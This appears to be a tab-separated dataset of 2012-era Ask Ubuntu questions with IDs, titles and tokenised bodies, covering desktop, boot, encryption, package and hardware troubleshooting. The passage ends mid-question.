95108	lost my user directory , all files still there when viewing unmounted partition from rescue disk , how to restore ?	solution : boot with ubuntu live usb , find the missing user directory in /media , back it up , then boot into the recovery console root prompt , run mount -a to force mount everything in fstab , then reboot and try logging in again . details : backup /home/myuserdir using cp -ax to preserve all links and attributes : plug in an external hard drive or other backup media via usb . boot from usb startup disk . 1 2 open a terminal , cd /media find the unmounted /home partition in /media . it may be named a long guid string instead of /home . just cd into it and see if the missing /home/myuserid ( or / [ guid ] /myuserid ) partition is there . once you 've found it , then ... copy the entire user directory to backup media using cp -ax to preserve links and attributes : ubuntu @ ubuntu : / > cd /media/ [ guid ] ubuntu @ ubuntu : /media/ [ guid ] > cp -ax * /media/backupdrivename/backupdir this will take a while . about 30-40m for my 117gbs , for reference . log out , shutdown , remove the usb startup drive and the backup hard drive . reboot into the ubuntu recovery console . hold shift down while booting to display the grub boot menu . choose the recovery console boot option . in recovery console , select the option to drop into a root prompt . at the root prompt , run mount -a to mount everything in /etc/fstab . now check /home with ls -al /home . with luck /home/myuserdir is now there . reboot with sudo reboot . if ubuntu starts the auto filesystem check during reboot , let it run , do n't cancel . at the login screen , login with normal userid . after this my /home/userdir had been restored and i could log in normally and everything worked . i 'm using 11.10 ( ext4 ) and somehow i 've lost /home/myuserid . /home is there , but appears empty . i can boot to the login prompt and login as guest , but when attempting to login as myuserid , i get routed back to the login screen . i can also boot into recovery mode via grub , then to a root prompt . as both guest and root , /home appears empty : root @ ubuntu : ~ $ cd /home root @ ubuntu : /home $ ls -al total 0 drwxr-xr-x 1 root root 60 2012-01-13 07:42 . drwxr-xr-x 1 root root 240 2012-01-13 07:42 .. root @ ubuntu : /home $ however , when i boot the computer with my ubuntu installation usb , run from usb , and open nautilus , i can see /home/myuserid is there , and all the files in it are intact . i tried recovering it using parted as explained on the ubuntu data recovery page , but the rescue start end command did n't do anything ( did n't even give a return code , just a new prompt ) . it seems like i 've just deleted a pointer in the partition table to the location on disk or something , without deleting the actual partition and files . anyone know how to restore /home/myuserid ? thanks ! ps - i 've read through many of the threads here on this topic , but they all seem oriented toward restoring lost files , rather than restoring a partition table pointer to a user folder , or fixing a problem with a user folder not mounting correctly , or whatever it is i 've done here . my files really are n't lost , i can see and open them just fine when running from the usb drive , and i 'm hesitant to try recovery tools like photorec when 1 ) they do n't seem 100 % reliable , and 2 ) i suspect the solution is simpler . edit : @ arrange - /home is not mounted now . booting with the usb drive , which is what i 'm doing now , does not automount it . and yes /home is on its own partition ( as are /boot , swap , / , and /home , all on separate partitions ) .
95109	shortcuts and transparency in kubuntu oneiric	is there a way to set in kubuntu oneiric keyboard shortcuts to : show the desktop ( used to be called `` toggle showing desktop '' in old versions of kubuntu but now seems to be gone from the preferences ) . run specific programs ( e.g . winkey+e will start dolphin , winkey+t will start konsole , etc . ) also , is there a way to disable the transparency of the bottom panel ? i do n't want to completely disable transparency , only to prevent the panel to change its looks every time my wall changes ( i use slideshow ) .
95111	32 bit java on 64 bit ubuntu	will sun java 6 update 30 ( 32 bit version ) work on ubuntu 10.10 ( 64 bit version ) ? i should use sun instead of openjdk because the support people for the api i am interfacing to referred me to sun . i should use the 32 bit java 6 because sun/oracle 's website says that it is to be used if you are using a web start application . ( it appears that my java code talks to an api that is offered by a web start application . )
95112	get available languages and change default lightdm lang with python	i need to get list of available languages and related country ( e.g . en_us - united states ) using python . then i would like to change default system language using python . there is language switcher in lightdm and i use auto-login so maybe change lang there ? -but how ? ( using python ) thank you .
95116	how to add/edit parameters for a startup service ( /etc/init.d/ )	i have installed pure-ftp server but i had problems logging into it with virtual users . i managed to diagnose the problem : it 's the incomplete default parameter specification . this is how the script starts by default at startup : starting ftp server : running : /usr/sbin/pure-ftpd -l pam -u 1000 -8 utf-8 -e -o clf : /var/log/pure-ftpd/transfer.log -b but that 's not good because -l is not specified . this is the correct form to start it : pure-ftpd -l puredb : /etc/pure-ftpd/pureftpd.pdb so , the q is : how to change the startup param definition for pure-ftpd ?
95121	is my amd dual graphics card compatible with ubuntu ?	does amd dual graphics with amd a8 cpu + amd 6670 gpu work on desktop with ubuntu ? and is it possible to use the gallium3d driver ?
95129	keyboard icon on unity panel dissapeared	i 've noticed that i do n't have a keyboard layout icon on unity panel . there are 3 layouts configured , but i ca n't change between them , not even with defined keyboard shortcuts . how to solve this issue and how to get the icon back to the panel ? ubuntu 11.10/unity
95133	acer aspire z5610 touchscreen all-in-one dual boot	i have installed ubuntu 11.10 on wubi in a windows 7 environment . after successful installation and reboot , i am presented with the dual-boot prompt as expected . however , my keyboard/mouse are wireless , i can not choose between oss ; stuck with windows 7 . obviously , the touch screen does not repond at dual-boot point . is there a solution to this problem ?
95134	why the cpu make noises ?	i installed the ubuntu operating system and it work . but , when i use it , the my cpu make strong noises . why it this happening ? what the problem ?
95136	converting images to pdf without quality loss	i am converting images to pdfs . i use following command convert page.jpg page.pdf and then combine multiple pdfs generated accordingly by command pdftk 1.pdf 2.pdf output result.pdf but i noticed loss of quality in the resulting pdf . is there some way that i can retain the quality of the pdf i. e. i want the same quality in pdf as in the image . i am not sure if this convert command is using the imagemagick library . is there any better solution ? i have 100s of pdfs , so i have to do it via command line .
95137	how to change luks passphrase ?	having installed ubuntu 11.10 with whole disk encryption and lvm , i need to provide a way for users to easily change luks passphrase . preferably , this should be done using gui tools , thus , enabling novice users to perform this basic task .
95140	how do i restart orca ?	orca has been crashing a lot lately.. and i do n't know how to restart it . is there any way to do this from the command line ? i can not find orca anywhere in the main menu .
95141	what is the difference between gwibber 's home and messages ?	in the newest version of gwibber , there are several tabs . i get the replies , private messages , etc. , however , i ca n't seem to find what the difference is between home and messages . on seems to refresh more than the other , or something , but other than that they seem to hold the same content .
95144	intel 852gme driver	update 1 : so just to finalise the question/answer , it is not possible for me to install the correct drivers for my laptop on ubuntu 10.04 . i will have to wait for ubuntu 12.04 if i want to stick with lts releases ? original question : i have a toshiba satellite pro a40 : cpu : mobile intel pentium 4 3.0ghz ram : 2gb hdd : 80gb gpu : intel 852gme to install ubuntu 10.04.3 , i had to enter i915.modeset=0 xforcevesa just to get started . this has allowed me to successfully install 10.04.3 , but i do n't seem to have any graphics acceleration . so my question is , are there any drivers available for ubuntu for the intel 852gme chipset ? i would like to try out unity ( not unity2d ) which i ca n't do at the moment
95148	is there a virtual classroom platform ?	i am looking at running virtual classroom sessions over the web . the thing is i need the following to be satisfied : i use ubuntu and my students may use anything ideally this is browser-driven but not a requirement . it should have a whiteboard , audio ( video is a plus ) i will need the students to see my gedit and browser screens as i type . i 've already seen one called wiziq.com but this is only for windows .
95150	unity crashed how to get it back on ubuntu 11.10	today i accidentally disabled the unity in compiz managier ( ccsm ) , when the os struk i gave it a reboot , from then the unity is not see , how to start compiz and re enable unity
95152	download ubuntu 64bits version	i went to http : //www.ubuntu.com/download/ubuntu/download to download the last version of ubuntu 64 bits but i 've noticed that the 32 bits version is recommended . why the 32 bits version is recommended i want to take full advantage of my hardware .
95153	detect gtk theme change in runtime	i am using this code to set appropriate appindicator icon for my application . basically i set separate mono dark/light icon for ambiance and radiance theme in order to integrate my app into unity desktop just like many other apps do . this works well , but what i noticed is that other apps ( tomboy , thunderbird ... ) update their appindicator icons immediately after the theme is changed . how do they do that ? with my current implementation , i need to restart my app in order to get the right icon .
95154	is it possible to encrypt home drive after install w/o 2.5x the space ?	i was about to use the encryptfs procedure to migrate my existing home folder and discovered that the process needs 2.5x the size of home to complete . i have 258gb in my home , but only 430gb free . is there a way that i can encrypt home without reinstalling ?
95159	how can i encrypt ubuntu filesystems only ?	i have windows 7 64bit and ubuntu 11.10 64 bit installed . ubuntu has 3 partitions : /swap , / and a separate /home . windows has 4 ntfs partitions . i to want encrypt all 3 of my ubuntu partitions , not the entire whole disk .
95160	where does banshee store playlists and podcast metadata ?	i 'm in the process of doing a system re-install . i 've seen : best way to backup all settings , list of installed packages , tweaks , etc ? there are a couple of specific apps i want to double check that all their data/metadata will be saved if i copy my home directory ( with hidden directories ) . so i wanted to ask where banshee stores the metadata about podcast subscriptions , old vs new podcasts , and playlists , etc .
95163	how to encrypt ubuntu filesystems only ?	friends , i have windows 7 ultimate 64bit and ubuntu 11.10 64bit version . my laptop comes with 500gb hdd and did 8 partitions . in that 5 are ntfs and 3 partitions for ubuntu as follow swap home and / . i want encrypt my alll my linux partitions only.not on my windows is it possible . plz explain me step by step.. thanks a lot ...
95165	how to fix that terminal ca n't input anything when other shell 'exit ' ?	i found that when i open two terminal and exit any one , it will cause the other ca n't input any character . i found that i can use alt+tab change the focus to other program and change back can temporarily back the normal state , but every time when i exit terminal will cause this problem again . how to fix it ?
95169	lamp server installation stops at 79 % configuring mysql ( ec2 bitnami ami )	i have created an ubuntu 10.04 cloud server on the amazon cloud ( ec2 ) i am encountering a stalled lamp install each time i try it . i 've created about 5 fresh instances . each time the installation gets stuck at 79 % on the `` configuring mysql-server-5.1 '' portion of the install . first i do an update ( sudo apt-get update ) then an upgrade ( sudo apt-get upgrade ) then try to install the lamp using tasksel . i 've done this before on a rackspace cloud server and it works fine . every single attempt fails on ec2 instances . i will contact amazon but i am also asking here in case it is an ubuntu specific issue and possibly a known issue that someone can guide me towards solving . the region is eu west ( ireland ) . the ami id is ami-00e9d874 . the instance type is m1.large . i 've tried several different amis though ( all ubuntu x64 10.04 )
95170	the volume âbootâ has only 0 byte disk space remaining	i am in ubuntu 10.04 . when i install the software updates with `` update manager '' , there is a pop up dialog which tells me `` the volume `` boot '' has only 0 byte disk space remaining '' my current kernal in use is : myname : ~ $ uname -r 2.6.32-37-generic the content of boot folder is : myname : ~ $ ls -lah /boot total 217m drwxr-xr-x 4 root root 3.0k 2012-01-13 15:18 . drwxr-xr-x 24 root root 4.0k 2012-01-13 15:21 .. -rw-r -- r -- 1 root root 626k 2010-04-16 16:01 abi-2.6.32-21-generic -rw-r -- r -- 1 root root 637k 2011-01-11 03:18 abi-2.6.32-28-generic -rw-r -- r -- 1 root root 637k 2011-02-11 21:56 abi-2.6.32-29-generic -rw-r -- r -- 1 root root 637k 2011-03-02 04:27 abi-2.6.32-30-generic -rw-r -- r -- 1 root root 637k 2011-04-09 02:35 abi-2.6.32-31-generic -rw-r -- r -- 1 root root 637k 2011-04-21 01:52 abi-2.6.32-32-generic -rw-r -- r -- 1 root root 637k 2011-07-30 03:17 abi-2.6.32-33-generic -rw-r -- r -- 1 root root 638k 2011-09-14 03:51 abi-2.6.32-34-generic -rw-r -- r -- 1 root root 638k 2011-10-11 23:33 abi-2.6.32-35-generic -rw-r -- r -- 1 root root 638k 2011-11-09 03:33 abi-2.6.32-36-generic -rw-r -- r -- 1 root root 638k 2011-12-03 04:08 abi-2.6.32-37-generic -rw-r -- r -- 1 root root 114k 2010-04-16 16:01 config-2.6.32-21-generic -rw-r -- r -- 1 root root 114k 2011-01-11 03:18 config-2.6.32-28-generic -rw-r -- r -- 1 root root 114k 2011-02-11 21:56 config-2.6.32-29-generic -rw-r -- r -- 1 root root 114k 2011-03-02 04:27 config-2.6.32-30-generic -rw-r -- r -- 1 root root 114k 2011-04-09 02:35 config-2.6.32-31-generic -rw-r -- r -- 1 root root 114k 2011-04-21 01:52 config-2.6.32-32-generic -rw-r -- r -- 1 root root 114k 2011-07-30 03:17 config-2.6.32-33-generic -rw-r -- r -- 1 root root 114k 2011-09-14 03:51 config-2.6.32-34-generic -rw-r -- r -- 1 root root 114k 2011-10-11 23:33 config-2.6.32-35-generic -rw-r -- r -- 1 root root 114k 2011-11-09 03:33 config-2.6.32-36-generic -rw-r -- r -- 1 root root 114k 2011-12-03 04:08 config-2.6.32-37-generic drwxr-xr-x 3 root root 4.0k 2012-01-13 15:18 grub -rw-r -- r -- 1 root root 14m 2010-08-24 12:00 initrd.img-2.6.32-21-generic -rw-r -- r -- 1 root root 14m 2011-01-27 16:26 initrd.img-2.6.32-28-generic -rw-r -- r -- 1 root root 14m 2011-03-25 11:11 initrd.img-2.6.32-29-generic -rw-r -- r -- 1 root root 14m 2011-03-28 09:32 initrd.img-2.6.32-30-generic -rw-r -- r -- 1 root root 14m 2011-06-20 15:33 initrd.img-2.6.32-31-generic -rw-r -- r -- 1 root root 14m 2011-06-22 13:02 initrd.img-2.6.32-32-generic -rw-r -- r -- 1 root root 14m 2011-08-10 10:37 initrd.img-2.6.32-33-generic -rw-r -- r -- 1 root root 14m 2011-10-21 19:02 initrd.img-2.6.32-34-generic -rw-r -- r -- 1 root root 14m 2011-11-11 10:03 initrd.img-2.6.32-35-generic -rw-r -- r -- 1 root root 14m 2011-12-05 17:13 initrd.img-2.6.32-36-generic -rw-r -- r -- 1 root root 14m 2012-01-13 15:18 initrd.img-2.6.32-37-generic drwxr-xr-x 2 root root 12k 2010-08-05 00:24 lost+found -rw-r -- r -- 1 root root 157k 2010-03-23 11:37 memtest86+.bin -rw-r -- r -- 1 root root 1.7m 2010-04-16 16:01 system.map-2.6.32-21-generic -rw-r -- r -- 1 root root 1.7m 2011-01-11 03:18 system.map-2.6.32-28-generic -rw-r -- r -- 1 root root 1.7m 2011-02-11 21:56 system.map-2.6.32-29-generic -rw-r -- r -- 1 root root 1.7m 2011-03-02 04:27 system.map-2.6.32-30-generic -rw-r -- r -- 1 root root 1.7m 2011-04-09 02:35 system.map-2.6.32-31-generic -rw-r -- r -- 1 root root 1.7m 2011-04-21 01:52 system.map-2.6.32-32-generic -rw-r -- r -- 1 root root 1.7m 2011-07-30 03:17 system.map-2.6.32-33-generic -rw-r -- r -- 1 root root 1.7m 2011-09-14 03:51 system.map-2.6.32-34-generic -rw-r -- r -- 1 root root 1.7m 2011-10-11 23:33 system.map-2.6.32-35-generic -rw-r -- r -- 1 root root 1.7m 2011-11-09 03:33 system.map-2.6.32-36-generic -rw-r -- r -- 1 root root 1.7m 2011-12-03 04:08 system.map-2.6.32-37-generic -rw-r -- r -- 1 root root 1.2k 2010-04-16 16:03 vmcoreinfo-2.6.32-21-generic -rw-r -- r -- 1 root root 1.2k 2011-01-11 03:20 vmcoreinfo-2.6.32-28-generic -rw-r -- r -- 1 root root 1.2k 2011-02-11 21:57 vmcoreinfo-2.6.32-29-generic -rw-r -- r -- 1 root root 1.2k 2011-03-02 04:29 vmcoreinfo-2.6.32-30-generic -rw-r -- r -- 1 root root 1.2k 2011-04-09 02:38 vmcoreinfo-2.6.32-31-generic -rw-r -- r -- 1 root root 1.2k 2011-04-21 01:54 vmcoreinfo-2.6.32-32-generic -rw-r -- r -- 1 root root 1.2k 2011-07-30 03:19 vmcoreinfo-2.6.32-33-generic -rw-r -- r -- 1 root root 1.2k 2011-09-14 03:53 vmcoreinfo-2.6.32-34-generic -rw-r -- r -- 1 root root 1.2k 2011-10-11 23:34 vmcoreinfo-2.6.32-35-generic -rw-r -- r -- 1 root root 1.2k 2011-11-09 03:34 vmcoreinfo-2.6.32-36-generic -rw-r -- r -- 1 root root 1.2k 2011-12-03 04:10 vmcoreinfo-2.6.32-37-generic -rw-r -- r -- 1 root root 3.9m 2010-04-16 16:01 vmlinuz-2.6.32-21-generic -rw-r -- r -- 1 root root 3.9m 2011-01-11 03:18 vmlinuz-2.6.32-28-generic -rw-r -- r -- 1 root root 3.9m 2011-02-11 21:56 vmlinuz-2.6.32-29-generic -rw-r -- r -- 1 root root 3.9m 2011-03-02 04:27 vmlinuz-2.6.32-30-generic -rw-r -- r -- 1 root root 3.9m 2011-04-09 02:35 vmlinuz-2.6.32-31-generic -rw-r -- r -- 1 root root 3.9m 2011-04-21 01:52 vmlinuz-2.6.32-32-generic -rw-r -- r -- 1 root root 3.9m 2011-07-30 03:17 vmlinuz-2.6.32-33-generic -rw-r -- r -- 1 root root 3.9m 2011-09-14 03:51 vmlinuz-2.6.32-34-generic -rw-r -- r -- 1 root root 3.9m 2011-10-11 23:33 vmlinuz-2.6.32-35-generic -rw-r -- r -- 1 root root 3.9m 2011-11-09 03:33 vmlinuz-2.6.32-36-generic -rw-r -- r -- 1 root root 3.9m 2011-12-03 04:08 vmlinuz-2.6.32-37-generic questions : among those files in boot folder , which can be removed ? how to remove by using synaptic package manager tool ?
95171	how do i reset unity in ubuntu 11.10 ?	i have just installed gnome-tweak to customize the theme . now my whole desktop is reset to factory settings . the shortcuts that i added in the launcher are gone . colors of fonts have changed.also i ca n't change desktop backgrounds . why is this ..how do i reset ubuntu to how it was before ? thanks for any help in advance .
95176	i cant install ubuntu properly on my dell inspiron 15r ( n5110 )	the laptop is a dell inspiron 15r ( queen ) it comes with windows 7 and i want to install ubuntu 11.10 on a different partition , yet , the problen is as follows : the system has 3 primary partitions already : one is a 100mb partition in fat with 33mb used , located at the beggining of the drive . next is the dell back-up partition 15gb and finally the system partition . i do the proper defrag , etc . on windows and then install the system using the partition manager option . here comes the first problem , it asks me where should i install grub , i have tried the 3 existing partitions ( putting aside the ones i 've created for the linux install ) and none of them worked , windows 7 keeps on booting without the grub prompt to ever appear . i 've also tried to put grub on the newly created ubuntu partitions and nothing happened either . i know that the system is intalled , for the options of ubuntu live cd include new options such as install over the already existing ubuntu system , but i ca n't get grub to work , is it just me or windows is preventing me from using ubuntu ? the system has the following features : 6gb ram 650gb hdd intel core i7 processor 1gb nvidia m525 graphics it 's the 15r `` queen '' setup .
95177	brightness controls does n't work on a macbook pro 5.5	i recently installed ubuntu on my macbook pro 5.5 ( mid 2009 ) . i have a problem with the brightness control . the thing is , when i try to reduce the brightness of my display which would help my battery life dramaticlly is doesnt work . i tried to use the system preference but no succes . i tried to look of it changes something if disconnect the computer from the charge i the screen will dimm but once against i failed . i tried many things such as pommed or many other little things that i have had read on forums .
95182	ubuntu error installation in sony vaio model vgn-t330fp	when i try to install any version of ubuntu i initially load the ubuntu screen , but then the screen goes black . please somebody help me
95185	installation of ubuntu 11.10 crashes	the installation of ubuntu 11.10 crashed before being completed . the issue seems to be known and there was also a bug description displayed . i gathered from this bug discription that the problem is not yet solved ( i downloaded the iso yesterday ) . am i right ? i then tried to download version 10.04 lts 34bit instead ( from http : //www.ubuntu.com/download/ubuntu/download ) . however , this was not possible either `` could not read source file '' . the download was not completed . can anyone tell me which version does not have an installation bug and where i can download it ? ? ! ! thanks . kind regards .
95187	desktop wo n't load	i installed unity 5.0 to test on my 11.10 setup and i 've just removed it recently . restarting the computer , i ca n't logon to my desktop now . i insert my password , then a black screen comes up and then it goes back to the login screen . installations sudo add-apt-repository ppa : unity-team/stages sudo apt-get update sudo apt-get dist-upgrade removal sudo ppa-purge ppa : unity-team/stages
95190	what is an ubuntu localized image and how do i create one ?	i 've heard that is possible to build customized versions of ubuntu in different languages . what are these and how can i make one ?
95192	what is the equivalent of 'control-alt-delete ' ?	on windows anytime the system hangs ctrl-alt-del brings up the start up manager , from which you can end the program or process causing the hang . is there any command like this on ubuntu ?
95194	kernel panick how to recover	i installed unity 5.0 on my ubuntu 12.04 experimental system . after installation of unity 5.0 plus some normal updates the system still boots but is shutting down because of kernel panik . i tried to recover in the repair mode , however , the system refuses dpkg -- configure -a by stating that the files are read only . same reactions on every installed kernel . help needed .
95199	two network cards and ip forwarding	i want to make `` ubuntu 11.10 '' act as a router . i have two lan interfaces . let 's say interface a ' ip is 172.16.1.10 ; interface b 's ip is 192.168.1.10 . how can i configure ubuntu so that 172.16.1.1 can connect to 192.168.1.1 ?
95200	how do i launch a different webcam program ( now it is cheese ) from the system indicator ?	i am using ubuntu 11.10 , when i click webcam option in right-top drop-down menu , ubuntu software center opens showing cheese webcam central page , 'cheese '' in ubuntu 11.10 is glitchy so i have installed camorama , is there any way to make camorama open instead of cheese when i press that option
95207	should i run ubuntu alongside windows or in a virtual machine ?	i would like to install ubuntu on my windows 7 64-bit pc to do analysis of astronomy data . the data files are often large ( can be few hundred mb , possibly a gb ) . the data files may be located on an external hard disk . the pc has 6 gb ram and 670 gb hard disk . i 'm trying to decide whether to do a proper dual-boot , installing ubuntu in its own partition ( i 'm nervous of messing around with the hard disk , have never done it before ) or to run ubuntu using virtualbox in windows . how much slower is running in virtualbox likely to be ? if i do go for a traditional dual-boot , would it make sense to divide the hard disk more or less equally between the two oss ? i would be very grateful for some advice . many thanks kevin
95208	ext4 data recovery from format	when doing a clean install of ubuntu 11.10 i accidentally selected for my data disk . i have already searched for the partition using testdisk and could n't find the data partition . files on the disk were video and audio files . any ideas ?
95210	how can i get juju running on eucalyptus ?	i 've a small private cloud running on uec 11.04 and eucalyptus , and everything works fine . but i still look for a software deployment solution better than writing scripts manually . the new juju seems perfect for my purpose . and even though the official faq says it can only support ec2 ( currently ) , i 've seen someone has show a environment.yaml containing the openstack section . but when i try it to bootstrap from a similar config , juju will throw http 500 error or still connect to aws and complained that the access keys is not in records . so does anyone run juju on openstack or eucalyptus successfully ? i could n't find any article about it . or can somebody tell me the main difficult to implement that ? thanks !
95211	how do i set up bash completion for command arguments ?	when i open up the command line and type in git , i get a bunch of completions for arguments of git , like add , commit , merge , and so on . how do i add this kind of completion to my own apps ? so far , i 've been able to specify the first level of completion like this : $ complete -w `` asd asdf '' ./test.py $ ./test.py asd asd asdf but it tries to keep going after that : $ ./test.py asdf asd asd asdf i 've tried setting a completion for the second level by running complete -w `` lol '' `` ./test.py asd '' , but that does n't work . what 's the proper way to set these up ? and once i 've figured out all of the commands , where do i have to put them ? running a big list of these commands in .bashrc , every time a terminal is opened , does n't seem too efficient ( plus i do n't want to mess with users ' files if i do n't have to ) .
95220	how to partition my hard disk to facilitate installation ?	i am new to linux family and willing to install ubuntu 11.10 x86 ( 32 bit ) alongside windows 7 , i.e. , dual-boot . i have searched a lot about how to make partitions of my hard disk for installing ubuntu but everyone follows a different rule or scheme which is making me a bit confused . so i am seeking help on how to install ubuntu alongside windows 7 . this is my laptop 's configuration : lenovo thinkpad - b560 processor - i3 ( 570m ) hdd - 500 gb ram - 4 gb intel 1 gb graphics and my partitions at this point is like : volume : file system : status : capacity : free space : ( c : ) ntfs primary 48.73 gb 30.36 gb ( h : ) ntfs logical 55.60 gb 55.51 gb ( g : ) ntfs logical 68.36 gb 60.14 gb ( e : ) ntfs logical 97.65 gb 93.53 gb ( f : ) ntfs logical 97.65 gb 96.00 gb ( d : ) ntfs logical 97.65 gb 95.28 gb system ntfs primary 100.00 mb 72.00 mb now when i am trying to make a primary root partition using the h : \ drive of mine , of about 20 gb , then the remaining 35 gb is showing as unusable . please help me on this on how to make partitions for root directory of 20 gb , swap partition 5 gb and a home directory of the remaining space ... so will i install ubuntu root drive by making primary partition or in logical partition ?
95221	how to change the default video folder from ubuntu tv	i installed ubuntu tv but the default video folder it uses is the videos folder but i have all my videos in a different folder . how can i change the folder to the folder where my videos are located .
95222	where can i find tclconfig ?	i 'm trying to install something that uses tcl and it requires the config file tclconfig . i 've installed tcl via sudo apt-get install tcl8.5 but after doing a search there is n't such a file . did i miss a step somewhere ?
95223	volume icon missing after removing ( and re-installing ) pulseaudio	i reinstalled pulseadio beacause i my indicator-sound just disappeared , but it did n't help . strangely , i have installed indicator-sound and still do n't have that sound control . nay , i do n't even have any settings in `` sound settings '' : i ran `` volume control pulseaudio '' from unity launcher and i got this : so i ran start-pulseaudio-x11 : $ start-pulseaudio-x11 connection failed : connection refused pa_context_connect ( ) failed : connection refused what can i do to fix it ?
95227	dependency is not satisfiable : python2.7-gnome2	dependency is not satisfiable : python2.7-gnome2
95230	does unity 5.0 demonstrate all of the planned changes to unity for 12.04 ?	according to the blog post didrocks wrote , it is said that unity is now frozen , except for approved changes ( or something to that effect ) . does this mean that unity 5.0 contains all of the changes for 12.04 ?
95233	how can i replace xubuntu with lubuntu on a windows xp laptop ?	i installed xubuntu 11.10 on an old windows xp in a separate partition . later , i realized that i should have installed lubuntu 11.10 . is there an easy way i can delete xubuntu and replace it with a clean install of lubuntu without deleting the partition ? if not , what 's the best way to delete xubuntu and start over ? by the way , this is my very first linux install so i 'm a definite newbie and would really like advice that does not involve using command lines . thanks .
95234	how to change lightdm font color to black ?	in /etc/lightdm/unity-greeter.conf i ca n't find this options . please help .
95236	custom print commands in gnome	i work in a situation where printing requires a script that i have written . i 'm wondering how to add a command ( in this case , my script ) as a printer in gnome so that it appears in applications like evince . my goal is to be able to print from evince through the script that i wrote .
95237	how do i stop ubiquity running on a live usb ?	i have used the usb creator and oneiric cd image to create a live usb system . i can not find any way to prevent an unattended boot from the usb to avoid ubiquity . by changing syslinux/txt.cfg i have made the default ( and only ) boot option `` textonly '' and removed `` only-ubiquity '' . if i interrupt the boot , choose f6 to bring up that boot parameter list and then proceed , it will boot strait into the live user . how do i avoid ubiquity for an unattended boot ?
95239	only one program showing in the top panel	i just started using gnome today and i 'm having a stupid difficulty to understand why , when i have more then one program open i ca n't see it on my top bar . to change between applications , i have to tab all time and i really do n't like it . what am i doing wrong ? i 'm using ubuntu 11.10 thanks in advance for any help .
95241	how do i start the mysql console in xampp ?	the xampp installation is done . xampp is up and running . what about the mysql console ? how is possible to start the mysql console to run some special sql statements ?
95252	is there any application/tool for quick translations of a selected word ?	i 'm looking for a simple application or tool that enables me to quickly translate a selected word ( for example when reading a pdf or document ) . i know there are several applications that offer translations but i 'm rather looking for just a small tool that completely runs in the background and uses the notification system for a quick translation of a selected word when a certain hotkey is pressed . especially german - english , english - german would be great . thank you very much for your help ! lots of greetings
95253	ubuntu boots to grub rescue	i have two systems installed previously windows 7 and ubuntu . i was trying to reinstall ubuntu and format the ubuntu os partition using a tool in windows 7 . when i have ubuntu ready on a usb stick and restart my laptop , it prompts me with the grub rescue screen . if i boot from usb to install ubuntu , it just hangs . anyway , i messed up everything . so my question is how can i boot windows 7 now ?
95254	how to access ubuntu files from windows on a dual-boot machine	i am running a dual-boot with windows xp and ubuntu 11.04 . ubuntu has open office as part of the install . occasionally , when using xp , i need to work on a spreadsheet or other open office document but ca n't seem to access them while using windows xp . is there a way that xp can crossover to ubuntu documents ? are two different versions of adobe also needed ?
95262	how can i set my bash window title to the last command that ran ?	i 'd like the title of my terminal windows to show the last command that ran . it 'd be handy for finding the terminal that 's running mongrel in dev/test/prod etc ( for testing rails apps ) . i tried this code : if [ `` $ shell '' = '/bin/bash ' ] then case $ term in rxvt|*term ) set -o functrace trap 'echo -ne `` \e ] 0 ; $ bash_command\007 '' ' debug # export ps1= '' \e ] 0 ; $ term\007 $ ps1 '' ; ; esac fi at least , i think that 's the code that i tried . it did work , but it caused some strange behavior , like window titles that would get stuck in a loop until i hit ctrl c when changing directory to a symlink . what 's a reliable way to set my window title to the last command that was run ?
95264	quicklist gnome-terminal do n't work with byobu profile	yesterday i tried to create a desktop quicklist for my gnome-terminal to open byobu with a specific byobu profile . there 's the part of my gnome-terminal.desktop file : [ netbook_byobu shortcut group ] name=netbook byobu exec=gnome-terminal -- disable-factory -- sm-client-disable -- class=netbook_byobu -x byobu_windows=netbook-session byobu targetenvironment=unity but nothing appends when i click on the shortcut . so i tried to launch the exec command . gnome-terminal open with an error : there were an error while the creation of the child process for this terminal the execution of the child proccess « byobu_windows=netbook-session » failed ( no files or folder of that type ) but when i launch byobu with the byobu profile : $ byobu_windows=netbook-session byobu the command works perfectly i do n't understand where the problem is . maybe someone could help me ? best regard , winael
95266	how to connect to internet from recovery mode ?	i am working on a kernel panic issue . as ubuntu is very reliant on internet , i am currently investigating how to connect to internet when choosing recovery mode . even in my healthy 11.10 system it doesnt work ( nor wireless , nor wired ) . i ticked for both cases available for all users . normally , in recovery mode the netroot option should give you access to the internet , but no joy . any idea ?
95267	mouse wheel click scrolling in firefox	just installed ubuntu 11.10 . been a while since i used any distro and i 'm very impressed . to be difficult , does anyone know how to enable the middle mouse button scroll option when browsing ? i do n't know if this is an os level thing or browser config . option . in windows , you can usually click the mouse wheel to bring up a scroll icon when using browsers . this allows you to scroll by moving the mouse instead of the mousewheel . i have rsi and find this method less taxing ... thanks for any help !
95271	how do i install on a dell inspiron 1501 ?	i 'm fixing up an old dell inspiron 1501 and want to run ubuntu on it . the hard drive broke and is being replaced with a new one . how should i go about installing ubuntu ? should i burn it to a cd from another computer and boot the dell with the cd ? also , what should i do about installing driver software on the dell ? i 've already downloaded all the drivers on another computer and i 'm confused as to how to install these drivers on ubuntu . thank you for your time . edit : i have another problem . i burned ubuntu on a cd , installed the new hard drive , went to bios and changed the boot order with the cd drive in spot 1 , inserted cd and restarted . a black screen with a message from broadcom reads , broadcom undi pxe-2.1 v2.1.0 pxe-e61 : media test failure , check cable . pxe-m0f : exiting broadcom pxe rom.. this screen stays until the computer is restarted and startup would not proceed beyond this point . we disabled broadcom pxe in bios boot priority screen . now the computer will stay on an empty black screen during the startup process .
95275	unable to install 64-bit vm using kvm	i 'm trying to install a 64-bit vm on a 64-bit host ubuntu 11.04 server . i am using the 64-bit iso ( ubuntu-11.10-desktop-amd64.iso ) and i set the architecture to x86_64 but when i install the vm it installs the 32 bit kernel . the cpu in the vm reports supporting 64-bit but the kernel but uname -m reports i686 .
95280	`` required version of distribute not available '' when installing imapclient	i 'm receiving the following error when i run the command `` easy_install imapclient '' : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package distribute root @ localhost : /var/www/somedir # easy_install imapclient install_dir /usr/local/lib/python2.6/dist-packages/ searching for imapclient reading http : //pypi.python.org/simple/imapclient/ reading http : //freshfoo.com/wiki/codeindex reading http : //imapclient.freshfoo.com/ best match : imapclient 0.8.1 downloading http : //freshfoo.com/projects/imapclient/imapclient-0.8.1.zip processing imapclient-0.8.1.zip running imapclient-0.8.1/setup.py -q bdist_egg -- dist-dir /tmp/easy_install-bmlbbm/imapclient-0.8.1/egg-dist-tmp-5ovann the required version of distribute ( > =0.6.24 ) is not available , and ca n't be installed while this script is running . please install a more recent version first , using 'easy_install -u distribute ' . ( currently using distribute 0.6.14 ( /usr/lib/python2.6/dist-packages ) ) error : setup script exited with 2 any thoughts on what might be causing this ? i 've tried running `` easy_install -u distribute '' as suggested in the 